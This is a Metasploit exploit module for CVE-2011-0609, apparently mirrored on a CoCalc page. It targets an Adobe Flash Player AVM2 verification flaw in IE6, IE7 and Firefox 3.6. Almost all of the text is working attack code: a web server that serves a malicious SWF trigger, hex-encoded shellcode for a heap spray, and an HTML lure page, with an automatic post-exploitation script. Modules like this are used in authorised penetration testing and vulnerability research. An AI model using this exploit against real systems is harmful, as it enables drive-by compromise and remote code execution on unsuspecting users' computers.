Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/windows/browser/adobe_flashplayer_avm.rb
19566 views
1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5
6
class MetasploitModule < Msf::Exploit::Remote
7
Rank = GoodRanking
8
9
include Msf::Exploit::Remote::HttpServer::HTML
10
11
def initialize(info = {})
12
super(
13
update_info(
14
info,
15
'Name' => 'Adobe Flash Player AVM Bytecode Verification Vulnerability',
16
'Description' => %q{
17
This module exploits a vulnerability in Adobe Flash Player versions 10.2.152.33
18
and earlier. This issue is caused by a failure in the ActionScript3 AVM2 verification
19
logic. This results in unsafe JIT(Just-In-Time) code being executed. This is the same
20
vulnerability that was used for the RSA attack in March 2011.
21
22
Specifically, this issue results in uninitialized memory being referenced and later
23
executed. Taking advantage of this issue relies on heap spraying and controlling the
24
uninitialized memory.
25
26
Currently this exploit works for IE6, IE7, and Firefox 3.6 and likely several
27
other browsers. DEP does catch the exploit and causes it to fail. Due to the nature
28
of the uninitialized memory its fairly difficult to get around this restriction.
29
},
30
'License' => MSF_LICENSE,
31
'Author' => [
32
'bannedit', # Metasploit version,
33
'Unknown' # Malcode version seen used in targeted attacks
34
],
35
'References' => [
36
['CVE', '2011-0609'],
37
['OSVDB', '71254'],
38
['URL', 'http://bugix-security.blogspot.com/2011/03/cve-2011-0609-adobe-flash-player.html'],
39
['URL', 'http://www.adobe.com/devnet/swf.html'],
40
['URL', 'http://www.adobe.com/support/security/advisories/apsa11-01.html'],
41
['URL', 'http://www.f-secure.com/weblog/archives/00002226.html'],
42
],
43
'DefaultOptions' => {
44
'EXITFUNC' => 'process',
45
'HTTP::compression' => 'gzip',
46
'HTTP::chunked' => true,
47
'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
48
},
49
'Payload' => {
50
'Space' => 1000,
51
'BadChars' => "\x00",
52
'DisableNops' => true
53
},
54
'Platform' => 'win',
55
'Targets' => [
56
[ 'Automatic', {}],
57
],
58
'DisclosureDate' => '2011-03-15',
59
'DefaultTarget' => 0,
60
'Notes' => {
61
'Reliability' => UNKNOWN_RELIABILITY,
62
'Stability' => UNKNOWN_STABILITY,
63
'SideEffects' => UNKNOWN_SIDE_EFFECTS
64
}
65
)
66
)
67
end
68
69
def exploit
70
path = File.join(Msf::Config.data_directory, "exploits", "CVE-2011-0609.swf")
71
fd = File.open(path, "rb")
72
@swf = fd.read(fd.stat.size)
73
fd.close
74
75
super
76
end
77
78
def on_request_uri(cli, request)
79
trigger = @swf
80
trigger_file = rand_text_alpha(rand(6) + 3) + ".swf"
81
shellcode = payload.encoded.unpack('H*')[0]
82
obj_id = rand_text_alpha(rand(6) + 3)
83
84
if request.uri.match(/\.swf/i)
85
print_status("Sending Exploit SWF")
86
send_response(cli, trigger, { 'Content-Type' => 'application/x-shockwave-flash' })
87
return
88
end
89
90
# we use a nice trick by having Flash request our shellcode and load it for the heap spray
91
# src for the flash file: external/source/exploits/CVE-2011-0609/exploit.as
92
if request.uri.match(/\.txt/i)
93
send_response(cli, shellcode, { 'Content-Type' => 'text/plain' })
94
return
95
end
96
97
html = <<-EOS
98
<html>
99
<head>
100
</head>
101
<body>
102
<center>
103
<object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000"
104
id="#{obj_id}" width="600" height="400"
105
codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab">
106
<param name="movie" value="#{get_resource}#{trigger_file}" />
107
<embed src="#{get_resource}#{trigger_file}" quality="high"
108
width="320" height="300" name="#{obj_id}" align="middle"
109
allowNetworking="all"
110
type="application/x-shockwave-flash"
111
pluginspage="http://www.macromedia.com/go/getflashplayer">
112
</embed>
113
114
</object>
115
</center>
116
117
</body>
118
</html>
119
EOS
120
121
print_status("Sending #{self.name} HTML")
122
send_response(cli, html, { 'Content-Type' => 'text/html' })
123
end
124
end
125
126